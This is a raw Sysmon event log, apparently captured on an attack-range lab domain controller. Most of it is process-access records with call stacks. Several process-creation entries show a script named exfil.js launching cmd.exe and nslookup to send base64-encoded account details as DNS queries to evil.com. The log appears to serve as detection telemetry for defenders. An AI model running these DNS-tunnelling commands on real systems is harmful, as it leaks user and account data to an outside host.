14:16:34.335{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.335{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.335{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.335{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.335{2E1864BB-17A1-629A-783D-000000005F02}55526064C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-C840-000000005F02}7780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.334{2E1864BB-17C2-629A-C840-000000005F02}7780C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvmz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.318{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloiuygi.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52799- 354300x8000000000000000201268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52798- 354300x8000000000000000201267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{00000000-0000-0000-0000-000000000000}6036<unknown process>-udptruefalse127.0.0.1-52798-false127.0.0.1-53domain 354300x8000000000000000201266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{00000000-0000-0000-0000-000000000000}6036<unknown process>-udpfalsefalse127.0.0.1-52797-false127.0.0.1-53domain 354300x8000000000000000201265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.721{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52797- 354300x8000000000000000201264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-52765-false127.0.0.1-53domain 354300x8000000000000000201263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.614{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-52763-false127.0.0.1-53domain 10341000x8000000000000000201262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-17C2-629A-C640-000000005F02}2600924C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-C740-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C740-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.265{2E1864BB-17C2-629A-C540-000000005F02}73046404C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-C740-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.269{2E1864BB-17C2-629A-C740-000000005F02}5792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-C540-000000005F02}7304C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloiuygi.tmp 2>&1 10341000x8000000000000000201254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.249{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-C640-000000005F02}2600C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.249{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-C640-000000005F02}2600C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.234{2E1864BB-17C2-629A-C640-000000005F02}2600924C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-C540-000000005F02}7304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.218{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C640-000000005F02}2600C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.217{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.216{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C540-000000005F02}7304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.216{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.216{2E1864BB-17A1-629A-783D-000000005F02}55527360C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-C540-000000005F02}7304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.215{2E1864BB-17C2-629A-C540-000000005F02}7304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloiuygi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.197{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluvxoo.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.149{2E1864BB-17C2-629A-C340-000000005F02}76207548C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-C440-000000005F02}7512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.149{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-C440-000000005F02}7512C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 